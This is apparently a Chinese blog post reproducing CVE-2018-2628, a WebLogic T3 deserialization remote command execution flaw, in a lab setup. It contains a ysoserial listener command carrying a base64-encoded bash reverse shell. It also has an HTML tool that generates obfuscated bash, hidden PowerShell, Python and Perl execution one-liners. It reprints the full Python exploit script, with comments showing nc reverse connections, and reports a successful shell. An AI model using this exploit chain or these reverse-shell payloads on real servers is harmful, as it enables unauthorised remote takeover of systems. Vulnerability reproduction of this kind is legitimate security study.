Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)
2024-04-11 12:18:11
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
漏洞产生原因:
攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。
漏洞复现
启动环境
通过ysoserial启动一个JRMP Server,因为Runtime的的原因,执行的命令需要编码,
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk2LjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"
使用下面的html网页进行编码即可:
<!DOCTYPE html>
<html>
<head><title>java runtime exec usage...</title>
</head>
<body><p>Input type:
<input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
<input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
<input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
<input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p><p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
<textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p><script>var taInput = document.querySelector('textarea#input');var taOutput = document.querySelector('textarea#output');function processInput() {var option = document.querySelector('input[name="option"]:checked').value;switch (option) {case 'bash':taInput.placeholder = 'Type Bash here...'taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';break;case 'powershell':taInput.placeholder = 'Type PowerShell here...'poshInput = ''for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);break;case 'python':taInput.placeholder = 'Type Python here...'taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";break;case 'perl':taInput.placeholder = 'Type Perl here...'taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";break;default:taOutput.value = ''}if (!taInput.value) taOutput.value = '';}taInput.addEventListener('input', processInput, false);
</script></body>
</html>先开启监听
使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包,
代码地址如下:
https://www.exploit-db.com/exploits/44553
源码如下:
# -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Is provided only for educational or information purposes.
#
# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run below command on JRMPListener host
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'
# 2. start a listener on attacker host
# e.g. nc -nlvp 4040
# 3. run this script on attacker host
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
# e.g.
# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)from __future__ import print_functionimport binascii
import os
import socket
import sys
import timedef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):#generates ysoserial payloadcommand = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)print("command: " + command)os.system(command)bin_file = open('payload.out','rb').read()return binascii.hexlify(bin_file)def t3_handshake(sock, server_addr):sock.connect(server_addr)sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))time.sleep(1)sock.recv(1024)print('handshake successful')def build_t3_request_object(sock, port):data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))data3 = '1a7727000d3234322e323134'data4 = '2e312e32353461863d1d0000000078'for d in [data1,data2,data3,data4]:sock.send(d.decode('hex'))time.sleep(2)print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))def send_payload_objdata(sock, data):payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'payload+=datapayload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)sock.send(payload.decode('hex'))time.sleep(2)sock.send(payload.decode('hex'))res = ''try:while True:res += sock.recv(4096)time.sleep(0.1)except Exception:passreturn resdef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(65)server_addr = (dip, dport)t3_handshake(sock, server_addr)build_t3_request_object(sock, dport)payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)print("payload: " + payload)rs=send_payload_objdata(sock, payload)print('response: ' + rs)print('exploit completed!')if __name__=="__main__":#check for args, print usage if incorrectif len(sys.argv) != 7:print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] ''[JRMPListener ip] [JRMPListener port] [JRMPClient]\n')sys.exit()dip = sys.argv[1]dport = int(sys.argv[2])path_ysoserial = sys.argv[3]jrmp_listener_ip = sys.argv[4]jrmp_listener_port = sys.argv[5]jrmp_client = sys.argv[6]exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)python exploit.py 192.168.96.168 7001 "C:/Users/11989/Desktop/渗透/java反序列化/ysoserial.jar" 192.168.96.1 8888 JRMPClient //第二个参数数yspserial的本地路径
反弹成功:
参考链接:
- Oracle Critical Patch Update - April 2018
- CVE-2018-2628 简单复现与分析
- GitHub - tdy218/ysoserial-cve-2018-2628: Some codes for bypassing Oracle WebLogic CVE-2018-2628 patch
Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)相关推荐
- Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
- 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...
- 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
- Apereo CAS 4.1 反序列化命令执行漏洞复现
文章目录 1. 前言 2. 利用 参考 1. 前言 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统.其4.1.7版本之前存在一处默认密钥的问题,利用这个默认 ...
- wpf window 不执行show 就不能load执行_Numpy反序列化命令执行漏洞分析(CVE-2019-6446)附0day...
1.介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy 提供大量的 函数和操作,能够帮助程序员便利进行数值计算.在 NumPy 1.16.0 版本之前存在反序列 ...
- FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...
- python pickle反序列化漏洞_Numpy反序列化命令执行漏洞分析(CVE-2019-6446) –vr_system...
1. 介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy提供大量的函数和操作,能够帮助 程序员 便利进行数值计算.在NumPy 1.16.0版本之前存在反序列化 ...
- 03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞
文章目录 漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞 影响版本 漏洞原理 漏洞复现 环境准备 漏洞检测 漏洞利用 验证漏洞利用是否成功 修复建议 漏洞名称:Apereo CAS 4. ...
- CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 本文仅为验证漏洞,在本地环境测试验证,无其它目的 漏洞编号: ...
最新文章
- devops开发运维训练营_嗨,网络开发人员训练营的毕业生:这是您第一份工作需要了解的内容。...
- 官宣!今日北京降雪已达初雪标准
- vmware安装linux不能和主机互通,Ubuntu18.04系统主机与虚拟机互通问题的解决方法...
- 面试必备:synchronized的底层原理?
- 简单解决Ubuntu修改locale的问题
- 【C/C++】符号常量 常变量
- UserWarning: Error checking compiler version for cl
- 服务器2003系统序列号,Windows Server 2003 R2 With Sp2 序列号
- 服务器2008系统提权工具,提权教程:winserver2008R2溢出提权
- Tableau零基础教程
- 微信订阅号改回列表显示
- JITSI开源视频直播
- word目录中英文开头目录不对齐
- C++11多线程 内存序(std::memory_order_relaxed)
- vue.js根据数据循环生成表格_Vue Elenent实现表格相同数据列合并
- sis 最新_传统SIS系统面临考验——“可持续的安全仪表系统”来袭
- 618买什么运动装备、最值得入手的运动装备合集
- java短视频开发技术_看Java学员如何用前后端分离技术搭建短视频健身APP
- jovi语音助手安装包_Jovi语音助手安装包下载-vivoJovi语音助手v3.1.1.0 最新版-腾牛安卓网...
- 视频网站主机服务器,视频网站主机服务器